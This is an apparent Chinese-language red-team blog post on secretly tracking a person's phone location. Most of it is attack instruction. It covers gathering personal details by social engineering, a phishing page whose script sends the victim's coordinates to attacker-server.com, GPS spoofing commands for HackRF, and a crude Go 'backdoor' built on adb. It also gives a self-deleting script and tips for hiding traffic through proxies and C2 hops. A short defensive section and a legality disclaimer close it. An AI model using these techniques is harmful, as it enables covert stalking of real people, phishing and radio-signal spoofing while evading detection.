一、深入理解手机定位技术的攻防原理
在一次红队任务中,我需要追踪目标人员的地理位置,但目标没有明显的漏洞暴露,也不可能直接访问他的设备。于是,我深入研究了各种手机定位技术,结合社工手法和技术手段,成功完成了任务。这篇文章将完整拆解手机定位追踪的细节和攻防思路。
手机定位技术的核心在于利用多种信号源(如GPS、WiFi、蜂窝网络、蓝牙等)获取设备的地理位置。无论是合法的定位服务还是攻击者的技术利用,这些信号都是实现定位的基础。简单来说,手机定位的攻防领域可以分为以下几类技术原理:
- GPS劫持与信号欺骗:通过伪造GPS信号,诱导目标设备上传错误的位置信息。
- WiFi探针技术:利用WiFi信号强度和SSID信息,估算目标设备的地理位置。
- 蜂窝基站定位:通过分析设备与周围基站的通信数据,计算目标位置。
- 恶意应用注入:植入具有定位权限的恶意应用,实时获取目标位置信息。
- 社工定位链:构造钓鱼链接,诱导目标设备自我暴露地理信息。
攻击者的思路很简单:借助目标设备已经暴露的信号或漏洞,实现远程追踪,而不需要直接接触设备。这就是我们红队行动中的核心策略。
---
二、锁定目标:信息收集与入口点分析
在一次行动中,找到目标的攻击入口是最重要的第一步。这里的目标可以是某台手机,也可以是目标使用的定位服务。我的常规做法是从以下几个方向入手:
1. 社工情报获取
通过社工手段获取目标的信息,比如手机号、邮箱、常用的WiFi热点、社交账号等。这些信息可以帮助我们评估目标的暴露面,并找到技术攻击点。
示例:
如果目标经常在社交媒体上发布实时动态,就可以通过分析照片中的地理标签或配套信息反推目标的常用位置。
2. 信号扫描
利用WiFi探针、蓝牙扫描等技术,捕获目标设备周围的无线信号。例如,当目标在某个公共场所时,可以通过扫描SSID和信号强度,筛选出目标设备。
Shell脚本示例:WiFi信号捕获
<pre><code class="language-shell">#!/bin/bash
利用iwlist扫描附近WiFi,并提取SSID和信号强度
echo "[*] 正在扫描附近WiFi..." iwlist wlan0 scan | grep -E "ESSID|Signal" | awk -F: ' /ESSID/ { ssid=$2 } /Signal/ { print "SSID: " ssid ", 信号强度: " $2 } '</code></pre>
3. 钓鱼邮件和链接
构造伪装成合法服务的邮件或链接,诱导目标点击并允许访问定位权限。比如伪装成快递通知,要求用户确认位置。
示例:
创建一个伪装成地图服务的钓鱼页面,并通过漏洞获取目标设备的地理位置: <pre><code class="language-html"><script> navigator.geolocation.getCurrentPosition(function(position) { var lat = position.coords.latitude; var lon = position.coords.longitude; // 将地理位置发送到攻击者控制的服务器 fetch('http://attacker-server.com/log?lat=' + lat + '&lon=' + lon); }); </script></code></pre>
---
三、构造攻击链:从入侵到定位
一旦目标暴露了入口点,就可以利用技术手段进一步实现定位追踪。以下是几种常见攻击链的构造方式。
GPS信号欺骗的实现
攻击者可以利用开源的GPS信号模拟工具(如GPS-SDR-SIM),伪造一个GPS信号源,诱导目标设备接收虚假的位置信息。
环境搭建:
- 准备一台支持软件无线电(SDR)的设备,如HackRF。
- 安装
gps-sdr-sim工具,用于生成伪造的GPS信号。
伪造GPS信号的过程:
<pre><code class="language-bash"># 生成指定位置的GPS信号数据 gps-sdr-sim -b 8 -l "39.9042,116.4074,100" -o gpssim.bin
利用HackRF广播伪造的GPS信号
hackrf_transfer -t gpssim.bin -f 1575420000 -s 2600000</code></pre>
恶意应用注入
在目标设备上部署一个恶意应用,并通过该应用获取实时地理位置。这种方法需要绕过目标设备的防御机制(如权限管理、杀毒软件)。
示例:实现一个简单的Go语言定位后门
<pre><code class="language-go">package main
import ( "fmt" "net/http" "os/exec" )
func main() { http.HandleFunc("/", func(w http.ResponseWriter, r *http.Request) { // 调用adb shell获取位置信息(需先root) cmd := exec.Command("adb", "shell", "dumpsys", "location") output, err := cmd.Output() if err != nil { fmt.Fprintf(w, "Error: %s", err) return } fmt.Fprintf(w, "Location Data: %s", output) })
fmt.Println("[*] 恶意定位服务已启动,监听端口: 8080") http.ListenAndServe(":8080", nil) }</code></pre>
---
四、隐匿痕迹:对抗追踪的技巧
作为红队,我们的目标不仅是成功完成任务,还要确保不被发现。以下是隐藏攻击痕迹的几个关键点:
1. 流量伪装
在传输地理位置信息时,伪装成正常的HTTP请求或HTTPS流量。例如,利用CDN中转,避免被直接溯源。
2. 多跳C2架构
通过多层代理(如Tor、VPS中转等),隐藏攻击者的真实来源。
3. 定时自毁
为了防止恶意代码被逆向分析,可以设置一个定时自毁机制。例如,恶意应用在完成定位任务后自动卸载或删除关键文件。
示例:定时自毁的Shell代码
<pre><code class="language-shell">#!/bin/bash
运行30分钟后删除自身
sleep 1800 rm -- "$0"</code></pre>
---
五、对抗与检测:红蓝交锋的博弈
对于蓝队来说,检测和防御手机定位攻击需要以下几方面的努力:
- 监控权限调用:定期检查设备中哪些应用访问了定位权限。
- 分析网络流量:通过流量分析工具(如Wireshark),发现异常的地理位置数据上传行为。
- 屏蔽伪造信号:部署GPS信号干扰检测设备,识别并屏蔽伪造的GPS信号。
---
六、个人经验分享
在我的红队生涯中,手机定位技术是一把双刃剑。它在追踪目标时非常有用,但也会暴露攻击者的行动轨迹。因此,每次使用这些技术时,我都会格外小心,确保攻击链的每个环节都经过严格测试。记住,隐藏自己比攻击目标更重要。
最后提醒一句:本文内容仅供合法授权的安全测试使用,请勿滥用技术,触犯法律。